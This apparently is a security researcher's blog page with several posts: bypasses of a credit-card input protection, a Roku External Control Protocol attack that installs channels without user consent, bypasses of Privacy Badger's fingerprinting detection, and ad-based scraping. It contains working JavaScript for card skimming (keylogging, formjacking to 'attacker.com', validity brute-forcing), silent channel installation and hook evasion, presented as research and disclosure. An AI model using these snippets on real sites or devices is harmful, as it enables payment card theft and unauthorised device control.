All your input are belong to me – 3rd party web security

Hello readers!

Today we are going to discuss another (not just adtech) madness: 3rd parties and their security. To make a long story short, modern web apps contain a lot of code (“tags”) from 3rd parties: analytics, ads, payments, widgets of all sorts (polls, comments) and many more. Generally, this is a good thing: those 3rd parties let the web app owner to focus on their core business and offload the implementation and maintenance costs of the desired functionality to a specialized 3rd party.

But this convenience comes at a (not only a financial) cost: 3rd parties are taxing the web with additional latency (but don’t worry, some good people are working on that!), and introduce 3rd party risk. In the context of web security, it means that if, for example, someone hacks your 3rd party’s CDN, he could replace the original code with malicious code, that will execute in your users’ browsers. Generally speaking, this is a special case of supply chain attack, that follows the rule of least friction: as web application became more robust over time, attackers now target the weakest link the chain: the 3rd party suppliers.

Once the 3rd party was breached, the malicious code could do many things, one of them is web skimming. From Wikipedia:

Web skimming is a form of internet or carding fraud whereby a payment page on a website is compromised when malware is injected onto the page via compromising a third-party script service in order to steal payment information.

One of the famous web skimming cases is the Magecart attack, which originally took advantage vulnerable Magento plugins in order to inject web skimming code into affected e-commerce websites.

Supply chain attacks though 3rd parties on web apps are a growing threat to businesses and users, so naturally, solutions arise, and those solutions can be divided into browser security features and commercial solutions.

On the browser features side, we have Content Security Policy (CSP) and Subresource Integrity (SRI). The former lets web app owners specify a whitelist of hosts and or a secret (“nonce”) that third parties must comes from or know the secret in order to execute, and the latter lets web app owners to specify a hash of a known good state of the 3rd party, and if its content produces a different hash, it won’t execute.

These features are good, but not perfect. In (very) short, authoring and enforcing a truly secure CSP is difficult and likely to break existing, desired 1st party and 3d party functionality, and SRI requires the web app owner to review the 3rd party code (how do you decide what’s a “known good state”?) and essentially “pins” it to a particular build, which means any update to the 3rd party code introduces new overhead of review & hash update, which is unrealistic in many scenarios. As a result of the said downsides, adoption of both is currently lacking and / or insecure.

On the commercial side, there’s literally tens of different companies (why? that’s another post) that offer protection solutions for 3rd party security, ranging from complete enterprise solutions to plain simple SaaS offerings. Technically, the can be divided into two approaches: website scanning and real time monitoring.

Scanning solutions are essentially automated browsers that crawl the monitored web app, which allows complete visibility and classification of each third party and its behaviors, without any integration friction (just submit your web app URL). The downsides are time difference between attack launch time to detection time, and manual incident response (no real time blocking). They are also subject to evasions by malicious code, similarly to what I described in “How bot detection technology is abused by malvertisers“.

The real time monitoring solutions are essentially scripts that implement some kind of DOM APIs access control in order to protect from other malicious 3rd party scripts, which allows real time detection and blocking without manual incident response. However, they require more integration efforts and introduce additional network and runtime latency: since they have to execute before the malicious 3rd party, and it means it should be placed above any other 3rd party as a synchronous script.

Another challenge with real time solutions is that browsers have huge API surface, which means there are many different ways to achieve a given goal, and it makes monitoring everything (coverage) hard. Let’s demonstrate this point.

First, let’s see how such access control mechanism might work; Assuming a naive implementation of protection from web skimming attack, the protection code that tries to prevent a malicious 3rd party from accessing the credit card input field in a payment form might look like:

let desciptor = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value');
let _get = desciptor.get;
Object.defineProperty(HTMLInputElement.prototype, 'value', {
    get: function () {
        let value = _get.call(this);
        if (/^4580+/.test(value)) {
            return 'NOPE!';
        } else {
            return value;
        }
    }
});

This code defines a getter function on the <input> element’s prototype value property, and if the value matches a credit card number (Visa for sake of demonstration), it return ‘NOPE!’ instead of the real value.

The code above is actually pretty similar to a challenge I got from one of the companies operating within this space, and the goal was to find as many bypasses as possible. It was deployed inside a mock ecommerce store with a payment form, which looked similar to the following JSFiddle (which wordpress won’t let me embed in anyway. I should move to substack).

Go ahead, type in a CC like number, and then pop up the console and try to type: creditcard.value, and you’ll get a solid “NOPE!”.

So, here’s all the methods I came up with to get the value anyway:

  • Change the input type and access an unprotected property:
creditcard.type = 'number';
creditcard.valueAsNumber;
  • Keylogging, can use oninput and onchange events as well:
creditcard.onkeypress = (e) => console.log(e.key);
  • Fail the regex test with prototype poisoning:
RegExp.prototype.test = () => 0; 
let orig_getter;
let _call = Function.prototype.call;
Function.prototype.call = function() {
    orig_getter = this; // steal ref
    return 'asd';
};
creditcard.value; // invoke getter
_call.bind(orig_getter)(creditcard);
  • Access the native getter from another realm. This one is similar to one of the methods described in “JavaScript tampering – detection and stealth” (And as I wrote there: “Solving this… requires us to execute the tampering in any newly created iframe, which is cumbersome and non-trivial to implement”):
let f = document.createElement('iframe');
let _get;
document.body.appendChild(f);
_get = Object.getOwnPropertyDescriptor(f.contentWindow.HTMLInputElement.prototype, 'value').get;
_get.call(creditcard);
  • Access by Selection API:
creditcard.select();
window.getSelection().toString();
  • Access by FromData API:
let fd = new FormData(creditcard.form);
fd.get('creditcard');
  • Break the regex test by inserting a prefix:
creditcard.focus();
creditcard.selectionStart = 0; 
creditcard.selectionEnd = 0;
document.execCommand('insertText', true, 'asd');
credit.value; // asd4580111111111111
  • Formjacking. Send the request to attacker controlled server:
creditcard.form.action = '//attacker.com';
  • Formajcking without from.action. This method sets the from method to GET which appends the input names / values as URL parameters, and and target property to send the request to a same origin iframe, that we could access its URL parameters, which contains the CC value.
let ifr = document.createElement('iframe');
ifr.name = 'ftarget';
ifr.style.display = 'none';
document.body.appendChild(ifr);
let f = creditcard.form;
f.target = 'ftarget';
f.method = 'get';
f.submit();
ifr.onload = e => {
    let sp = new URLSearchParams(ifr.contentWindow.location.href);
    console.log(sp.get('creditcard'));
};
  • Replace the input with identically looking non-input element, which we can access its value:
let p = creditcard.parentNode;
let d = document.createElement('div');
d.contentEditable = 'true';
d.className = creditcard.className;
p.removeChild(creditcard);
p.appendChild(d);
d.innerText; // after user entered CC
  • And my favorite: abuse client side validation to brute force the CC number digit by digit, using input pattern regex, taking advantage of ValidityState API. Similar to CSS exfiltration but applies to inputs without inline value attribute
let secret = '';
 function incrementRange (pattern, i) {
     return pattern.replace(/-[0-9]/, '-' + i);
 }
 function lastRangeToToken (pattern, i) {
     return pattern.replace(/[[0-9]-[0-9]]+/, i);
 }
 function addRange (pattern) {
     return pattern.replace(/[[0-9]-[0-9]]/, match => '[0-0]+' + match);
 }
 function bruteforce (pattern) {
     creditcard.pattern = pattern;
     for (var i = 0; i < 10; i++) {
      creditcard.pattern = incrementRange(pattern, i);
         if (creditcard.validity.valid) {
             secret += i;
             return bruteforce(addRange(lastRangeToToken(creditcard.pattern, i)));
         }
     }
 }

bruteforce('[0-0]+[0-9]*');
console.log(secret);

And that’s it! Go ahead and execute any of the methods above inside the JSFiddle and see for yourself.

The next step after stealing the CC number is to exfiltrate it over the network, which opens bunch of JS cat-and-mouse shenanigans, but that’s enough for today 🙂 Hope you enjoyed, and let me know if you have any more creative methods to solve the challenge above!

Attacking Roku sticks for fun and profit

Hello readers!

It’s really been quite a while, but here I’m back, and this time we’re going to explore Roku and video ads.

TL;DR: Ad fraud is easy on Roku and it’s possible to remotely install arbitrary channels without user interaction from a malicious ad / website.

Roku

For those who are unfamiliar, Roku is a line of popular media streamers that allow media streaming from different sources, i.e. “channels”, such as Netflix, Apple TV and more. Channels are developed by 3d party developers and can be found on the “channel store“. They aren’t just playing media, but actually feature rich apps (much like mobile apps) in terms of capabilities: they can respond to user interactions and input from sensors , so you can find games, Reddit clients, etc.

Ad tech

Roku offers channel developers both subscriptions and ads as monetization mechanisms. Roku devices are capable of displaying video ads using various industry standard formats, most notably VAST. For the developer side, they offer both Roku Advertising Framework (RAF) which is an SDK for requesting and rendering video ads, and a self serve platform to promote the channel and increase the audience. For the advertiser side, they offer OneView, which is based on their DataXu acquisition. In order to be eligible for ads monetization, a channel must be approved by Roku, based on its content and engagement metrics.

According to industry rumors, CPM on Roku are significantly higher than traditional web display and are in the rage of tens of dollar, depends on the channel’s content genre and ad type (pre / mid roll) and the device’s IP geolocation. Funnily enough, sometimes the ads CPM can, in fact, be higher then the cost of the Roku device itself, which fits perfectly their strategy, as put out by AdExchanger:

Roku’s go-to-market strategy is simple: Get as many streaming devices into as many homes as cheaply as possible, and monetize them through advertising.

Alison Weissbrot

Ad sec

Everybody in adtech knows that high CPMs attracts fraudsters, and Roku’s case is not different. In the past, several schemes were found and disclosed.

But it’s not just high CPMs. Roku (and Connected TVs in general) has weaker threat model, and it’s easier to manipulate the metrics without getting caught. Since Roku ads aren’t rendered inside a browser or webview of any kind but rather in the platform’s native player, traditional JavasScript based verification tag simply aren’t relevant.

Furthermore, RAF only supports VAST 2 and 3, which doesn’t even include the AdVerification element, nor even the Server Side Ad Insertion verification headers. Generally speaking, what’s left to verification vendor to do is to stuff their pixels inside the VAST Impression and TrackingEvents elements, which only allows them to performs basic checks against the requests timings and device IP, similarly to what I’ve described in the past in my overview of pre-bid filtering solutions. All other values are declared and cloud be easily spoofed by malicious actor.

Here’s a shot list of possible attacks:

  • Channel spoofing (aka counterfeit inventory): there’s no Ads.txt equivalent, so there’s no way to verify the the parameters in the bid request, which means esoteric channels can pretend to be Netflix, NBA, or whoever, in order to attract higher bids.
  • Device spoofing: It’s possible to initiate ad requests with Roku user agent from other agents (apps / browsers). Although detectable by TCP/HTTP fingerprints, Roku supports Server Side Ad Insertion which is ideal for fraud: Only one IP is needed as both requests and tracking events (such as mid quartile of the ad was played) are initiated by design from the publisher’s server.
  • Impression spoofing: with the lack of viewability measurements in CTV, it’s technically possible to initiate ad requests and fire the impression and event pixels with even drawing anything to the screen. All you need is an HTTP and XML parser libraries.

Attacking Roku sticks

All the ad fraud risks detailed above aren’t really Roku specific but rather apply to CTV advertising in general. However, I got myself a Roku stick for the purpose of specifically analyze it, and I found rather interesting findings: Roku exposes “External Control Protocol” over the local network, as described in their docs:

The External Control Protocol (ECP) enables a Roku device to be controlled over a local area network by providing a number of external control services. The Roku devices offering these external control services are discoverable using SSDP (Simple Service Discovery Protocol). ECP is a simple RESTful API that can be accessed by programs in virtually any programming environment.

While very convenient for the users, who can install things such as mobile Roku remote apps and they just work, this mechanism does not include any authentication mechanism, which means anything inside the LAN could use it to issue ECP commands to the Roku device.

So at least in theory, it’s possible to control Roku devices by executing JavaScript code on a browser that is running on the same LAN. Sounds great, isn’t it? Luckily, the default ECP port, 8060, is not blocked by browsers (some other ports are blocked, such as 22 for SSH, because of the exact same attack could be used on other sensitive services).

It means an attacker could, for example, run the malicious JavaScript code through ad networks, i.e. malvertising campaign, and send ECP commands to Roku devices, if the user behind the browser has one (and the attacker is able to locate its IP address, more on that later). I wanted to focus on this specific attack because it’s fairly easy to get your JS running cheaply, in large volumes, by (ab)using ad networks, which is important in order to make the attack practical and economically feasible by having reasonable cost of “user acquisition” relative to its monetization potential.

I wanted to see what’s possible with ECP, and going over the “general commands” in the docs (linked above), and two of them immediately jumped: install/<APP_ID> and keypress/<KEY>. As their names suggests, the former lets you launch the install screen of arbitrary app (channel) id, and the latter allows you to press whatever key you want to, as if you’re holding the Roku’s remote in your hand. Together, they are a powerful combination, since you can install (and lauch) any app on the victim’s device.

Now, let’s assume we have developed and uploaded an app to the Roku channel store, and we want to install it on as many users as possible. We want to do so because we can:

  • Create a paid channel and collect the payments from the victims. Remember, they didn’t choose to install anything, we will force their device to install our app with ECP. Easy, but considered as CC fraud and the FBI will find you 🙂
  • Create free channel and monetize it with ads. The challenge is that in order to display ads, the channel must be launched. Although it’s possible to launch it with ECP, it’s not stealthy. The user will notice that an unwanted channel is running and will close it and probably remove it. One solution to this problem is to find a bug in BrightScript (Roku’s app programming language) or other system component and exploit it for privileges escalation, then installing a daemon directly on the OS (Roku OS is Linux), but that’s hard. A much easier solution would be to install a screensaver, which, according to the docs, “is a channel which is run automatically when the system has been idle for a period of time.”

Now that we have two viable monetization options which we can execute by (ab)using ECP, the next missing step is finding the Roku’s IP address. Normally we would use SSDP search request, but unfortunately in our malvertising scenario, we can not read the SSDP response due to the browser’s Same Origin Policy, so another approach is needed – we have to do local network scanning in JavaScript, from the browser 🙂

The first step would be to find the address range that we need to scan, so WebRTC Peer Connection immediately comes to mind, because it uses ICE for NAT traversal and used the expose the internal IP of the client through SDP. This feature was abused in the past by fingerprinting vendors, even famously on NYTimes website by WhiteOps. Unfortunately (or fortunately, depends on how you look at this), not so long ago relative to time of this writing, browsers started to implement a proposal to use mDNS to protect users privacy when exposing ICE candidates, which means you’ll get an address that looks like 1f528c83-551f-4f34-ad3a-67524d2fed83.local instead of 192.168.1.4.

There are three blocks of IP addresses reserved for private networks:

10.0.0.0 – 10.255.255.255 (10/8 prefix)

172.16.0.0 – 172.31.255.255 (172.16/12 prefix)

192.168.0.0 – 192.168.255.255 (192.168/16 prefix)

For the sake of simplicity of our PoC, we are going to scan by brute force only the last one (192.168/16), which is most commonly used by home routers anyway, and they usually assign new clients IP (using DHCP) in the same subnet.

So what do we need now? A way to differentiate between the following options:

  1. an address that do not exist on the network
  2. an address that do exists, but doesn’t belong to a Roku device
  3. an address that exists and belongs to a Roku device

Achieving this goal was possible using the following method:

For each IP address, initiate HTTP GET request with Roku’s ECP port (8060), with Roku specific URL path (for example, 192.168.0.1:8060/query/apps). For 1, error event will be fired after the browser’s timeout passed, because the address is unreachable. For 2, error event will be fired because it’s not a valid URL. For 2, load event will be fired and we could use it to identify the Roku’s IP address.

Note that the requests must be HTTP and not HTTPS, as the Roku ECP doesn’t support HTTPS. Up until recently it was not a problem, because by using passive mixed content we could initiate HTTP requests from HTTPS, so we could run this network scan logic directly inside the malicious ad’s creative code.

However, Chrome recently started blocking mixed content (HTTP content on HTTPS websites) by default, without falling back to HTTP when the content isn’t available over HTTPS. Since most websites / ads are served nowadays over HTTPS, it would make it impossible to use this method directly in the ad, but still it’s possible to do so from an attacker controlled HTTP web page, either by making it the destination of the ad’s landing page (and buying PPC), or just programmatically force redirecting the user to such a page, which is a commonly used malvertising practice.

The following PoC code demonstrates this logic:

EDIT: After giving it a second thought, I won’t publicly share the PoC code. Although all the details needed in order to implement it are available here in this post, I don’t want to help script kiddies to launch attacks 🙂

So, after we found the IP address, all we have left is to send the ECP commands to install our channel:

let rokuAddress = 'http://192.168.1.8:8060'; // found previously with the scanner 
let appId = 14; // MLB is just used for demonstration, replace with our malicious channel id
let install = '/install/' + appId;
let keypress = '/keypress/'
let select = keypress + 'Select';
let home = keypress + 'Home';
function postToRoku (cmd) {
return fetch(rokuAddress + cmd, {method: 'POST', mode: 'no-cors'});
}
// launch the install screen
postToRoku(install).then(res => {
// press the intall button
postToRoku(select).then(res => {
// go back to home screen
postToRoku(home);
});
});

And, voila! Our channel just got installed on the victim’s Roku.

I really think this attack is not only theoretical, but really is a practical one. It’s possible to fix it be including a token in the initial SSDP response, that must be included in any subsequent ECP request. This way the Roku device could verify that the ECP requests are coming from a party that’s able to read the response, such as remote control mobile app, and not from a browser. Unfortunately, this is not backward compatible and would probably break existing apps that are built on top of ECP.

If you liked this post, are interested in ad security and want to chat – don’t hesitate to contact me! I’m also currently looking for new projects.

Detecting Privacy Badger’s Canvas FP detection

Hello readers! As promised in previous blog post, today I’ll write (a bit more technically) about third party JS security, but from a different angle.

Privacy Badger

Privacy Badger is a privacy focused browser extension by EFF, that detects and blocks third party trackers. Unlike other extensions, it does it by analyzing the tracking behaviors, rather than relaying on domains blacklist.

Canvas fingerprinting

On of these tracking behaviors is canvas fingerprinting, which I briefly mentioned in previous blog posts. Generally speaking, canvas fingerprinting is a method to generate stateless, consistent, high entropy identifier from the HTML5 canvas element, by drawing several graphics primitives into it and then serialize its pixels. Different browsers and devices produce slightly different pixels due to differences in their graphics rendering stack. You can read the paper “Pixel Perfect: Fingerprinting Canvas in HTML5” for more info.

Privacy Badger Canvas fingerprinting detection

From Privacy Badger website:

Does Privacy Badger prevent fingerprinting?

Browser fingerprinting is an extremely subtle and problematic method of tracking, which we documented with the Panopticlick project. Privacy Badger 1.0 can detect canvas based fingerprinting, and will block third party domains that use it. Detection of other forms of fingerprinting and protections against first-party fingerprinting are ongoing projects. Of course, once a domain is blocked by Privacy Badger, it will no longer be able to fingerprint you.

How Privacy Badger detect canvas fingerprinting

Privacy badger injects fingerprinting.js, along with several other context scripts, as specified in its manifest.json, to all the frames (all_frames: true) of all the pages (“matches”: [ “<all_urls>” ]) visited by the user, before any other script in the page has executed (run_at: document_start).

Content script have access to their frame DOM, but a separate JavaScript context. Because the goal of the script requires to monitors things that happen in the page JS context (canvas manipulation and serialization), this content script injects another, self removing script into the frame DOM, which executes in its JS context.

This script hooks into several canvas related APIs, including fillText (manipulation) and toDataURL (serialization). I wrote about JS hooking before, in the context of spoofing viewabiliy measurements. Whenever once of these APIs gets called, Privacy Badger hook is figuring out the caller script URL form within the call stack.

Threat Model

When designing and implementing fingerprinting countermeasures, there are two significant concerns:

  • Observability: which means trackers can fingerprint the presence of the fingerprinting countermeasure itself and using it as another data point in the fingerprint.
  • Bypassability: which means tracker can evade the fingerprinting countermeasure or rendering it useless, thus getting access to the desired fingerprinted feature.

Vulnerabilities in Privacy Badger canvas fingerprinting detection

  • Observability of the canvas API hooking:

as I wrote previously in depth at “JavaScript tampering – detection and stealth” (my most visited blog post so far!), there are several methods to detect that a native function was tampered with. Privacy Badger recognized this threat and tries to hide the tampering by setting the length, name, and toString properties of the hooked functions to match those of the original, but without referring to the native Function.protype.toString, a tracker can write:

Function.prototype.toString.call(HTMLCanvasElement.prototype.toDataURL);

And get:

"function wrapped() {
          var args = arguments;
...

Of course, it also won’t pass the prototype and hasOwnProperty test (detailed explanation here).

  • Bypassability of the APIs hooking

Privacy Badger recognized this threat site code tampering with its own code, and tries to prevent this by copying the objects it uses into its own function scope. However, it still relies on prototype inherited methods inside the hook code itself, and these methods can be abused to steal the reference to the original API. Let’s look closely on the hook code itself, which gets called whenever a consumer calls one of the hooked canvas APIs:

        function wrapped() {
          var args = arguments;

          if (is_canvas_write) {
            // to avoid false positives,
            // bail if the text being written is too short
            if (!args[0] || args[0].length < 5) {
              return orig.apply(this, args);
            }
          }

          var script_url = (
              V8_STACK_TRACE_API ?
                getOriginatingScriptUrl() :
                getOriginatingScriptUrlFirefox()
            ),
            msg = {
              obj: item.objName,
              prop: item.propName,
              scriptUrl: script_url
            };

          if (item.hasOwnProperty('extra')) {
            msg.extra = item.extra.apply(this, args);
          }

          send(msg);

          if (is_canvas_write) {
            // optimization: one canvas write is enough,
            // restore original write method
            // to this CanvasRenderingContext2D object instance
            this[item.propName] = orig;
          }

          return orig.apply(this, args);
        }

 As we can see, there’s an interesting exception: if is_canvas_write is true and the length of the first arg is shorter then 5, the original function gets called, using the prototype inherited apply method, and returns before send(msg) is called, so Privacy Badger won’t be considering it as a fingerprinting attempt, to avoid false positives.

We can look few lines up and see that is_canvas_write is computed as:

      var is_canvas_write = (
        item.propName == 'fillText' || item.propName == 'strokeText'
      );

So, our attack will look like this:

    • Hook the apply method
    • Call the hooked fillText or strokeText
    • Steal the reference to the original fillText or strokeText
    • Write to the canvas text with length > 5 using the original function

Let’s implement a PoC:

let _apply = Function.prototype.apply;
let original;
Function.prototype.apply = function () {
	// `this` is the function
	if (this.name === 'fillText' || this.name === 'strokeText') {
		original = this;
	}
	// restore the original apply
	Function.prototype.apply = _apply;
};

Then, we call the function:

var canvas = document.createElement('canvas');
var ctx = canvas.getContext('2d');
ctx.fillText('a');

And now we have the original fillText:

original
ƒ fillText() { [native code] }

Viola!

The same technique can be used to extract the original serialization method, toDataURL. Notice the call to getOriginatingScriptUrl which is also using prototype inherited methods that can be tampered with.

Another bypass method is to obtain a references to the original APIs by using the iframe sandbox attribute. This attribute allows us to specify permissions for the content inside the iframe, and if we specify the allow-same-origin permission and don’t specify the allow-scripts permission, the script injected by the context script won’t execute, according the the sandbox policy[1], but the embedding page will be able to access the iframe’s contentWindow and obtain an unhooked canvas from it.

That’s it for today! Although this topic could be expanded  even more, I’ll save something for next time 🙂

Hope you enjoyed, and feel free to contact me to discuss any of it!

[1] This is currently true in Firefox, but not in Chrome. In the past I observed the same behavior in Chrome, but from my test it seems like now DOM script that was added from content script will execute inside sandboxed iframes. I’m not sure if that’s intentional.

Bypassing anti scraping systems

Hello readers! Today we’re going to talk about how to bypass anti scraping systems.

First, let’s talk about scraping. From Wikipedia:

Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. Web scraping software may access the World Wide Web directly using the Hypertext Transfer Protocol, or through a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying, in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis.

Scraping is wildly used in variety of industries for various reasons. For example, it’s  often used by e-commerce companies for spying on their competitors prices, by flight agencies to gather flight routes data, real estate companies for rental data, etc.

In many cases, the original author, owner or publisher of the data doesn’t want his competitors to take his data for free or at all, because he wants to stay ahead of the competition.

This competing needs created two industries, one of companies specializing in scraping as a service, the other is companies specializing in scraping detection and prevention. This companies use the same bot detection techniques I wrote about in the past in the context of online advertising fraud, namely browser and bot fingerprinting. I also already wrote about cheating browser fingerprinting, so what is the difference this time?

The answer is that we are lazy and don’t want to work harder than necessary. Instead of carefully forging legit FPs for each anti scraping vendor used by our targets, we can just bypass it all entirely by breaking their security model assumptions. To get to the point: we don’t event need a bot to successfully scrape data off most websites.

But how? The answer is exploiting a third party JavaScript that runs on the target website, which has access to the websites DOM. We could, for example, hack the CDN of the website’s analytics provider and add our scraping code to the tracker, but that will be both difficult and highly illegal. Instead, we can use the easiest, cheapest way to get our code to runs on someone’s website, you’ve guessed it, online advertising!

As long as the ads are rendered in a same origin iframe, which is frequently the case, we can just access the top.document, find what we need, extract the data and send it back to our servers. No bot required whatsoever. Modern ad serving systems make our lives easier because we can target specific websites of interest, an once our creative loads in their page, we can use iframes, CORS XHRs and other techniques to extract data from even more pages on the site.

This method is just a special case of malvertising, or even more generally, third party risk. This category includes many more attacks. Recently I dived deeply into this space, as I seen several interesting attacks (magecart etc) and startup companies offering solutions to those. Maybe I’ll write some more about that. Hope you enjoyed the post and feel free to contact me for further discussion!

Secure header bidding architecture

Hello readers! It’s been quite a while. Today, I want to suggest a less insecure bot filtering architecture for online advertisers and publishers.

First, let’s have a quick overview of the current situation and define some terms:

Header bidding

Forget all the nonsense about “wrapper” that “sits the in header” and “wraps calls to the ad server with other demand partner”. I’ve read and heard explanations along these lines way too many times, and they are great example of complete adtech (jargon) madness. Like pretty much anything else in the browser, the “wrapper” is just a script that makes some network calls and execute some logic. Whether it’s located in the <head> or <body> is completely irrelevant implementation detail. </rant>.

In technical terms, header bidding library defines an interface which its adapters are implementing, allowing its consumers to use unified API to communicate with all of their demand partners. Originally invented as a hack to create a fair competition between Adx supply and other SSPs, and the de facto standard is Prebid.js (pbjs) which was originally created by AppNexus. Most other “unique proprietary header bidding wrappers” are just clones of pbjs with changed global variable name, and maybe some other niche features that cost way too much money for their value.

The general flow of pbjs look like this:

User loads the page, and pbjs is loaded with it. The page includes definitions of its ad units, sizes, media type, etc, and pbjs sends this info, along with the user info, to the configured demand partners by invoking their adapters. Then pbjs waits for response from all demand partners or a specified timeout, passing all the returned bids to the ad server using key-value targeting. The ad sever receives the ad request with the competing bids, runs its ad selection process, and returns its own creative if it have a better paying line item, and if not, a pre-configured pbjs creative that basically tells pbjs to render its highest bid’s ad markup.

So far so good.

Bot detection

As I wrote before, current bot detection for advertising  have two phases, pre-bid and post bid. To summarize, pre-bid detection is based on the network properties of the client that makes the bid request, and post-bid is based on browser fingerprinting. The advantage of pre-bid detection is that it happens before money is spent, the disadvantage is it’s less accurate and reliable than post-bid, which is on the other hand more secure, but occurs after the ad is already served and money is already spent.

 

Server to server

Remember I wrote about pbjs, “Then pbjs waits for response from all demand partners or a specified timeout”? It’s actually a bigger deal then it sounds at first. Latency is a big burden on both user experience and CPM rates (as it negatively affects viewability and number of served impressions), so a solution emerged in the from of Prebid server. It works the same as regular pbjs flow, but instead of invoking bidders from the clients browser, it invokes the from a dedicated server, returning to the client only the winning bid.

But it also breaks the security model of pre-bid bot detection, since now the client isn’t make the bid request to SSP by design, and that’s bad, because now bots are detected only after money is spent.

 

My suggested solution

Bot detection vendors set up a Prebid server that sits as a proxy between the publisher and the SSPs. It then should convince publisher to add their code, perhaps as a Prebid module, which will contains their bot fingerprinting code and will append to the initial request for the prebid server. The results should be mandatory and if not included, no bid requests will be passed to demand partners.

With this architecture, advertisers get the best of both worlds: the security of post-bid detection solutions with the money saving effect of pre-bid detection solutions.

For publisher, the incentive to implement this module will be higher CPMs and viewability rates, since all of their traffic is now validated. It’s also technically possible to create a module that reads the client side pbjs config an automatically re-directs it through the prebid server, which saves the publisher the technical overhead of moving to prebid server, while gaining the latency improvements.

The challenges of this solutions, are the costs associated with the required amounts of network and computational resources, but it maybe can be done economically.

Let me know what do you think! I’m waiting to see more JIRA refers to the blog now 😉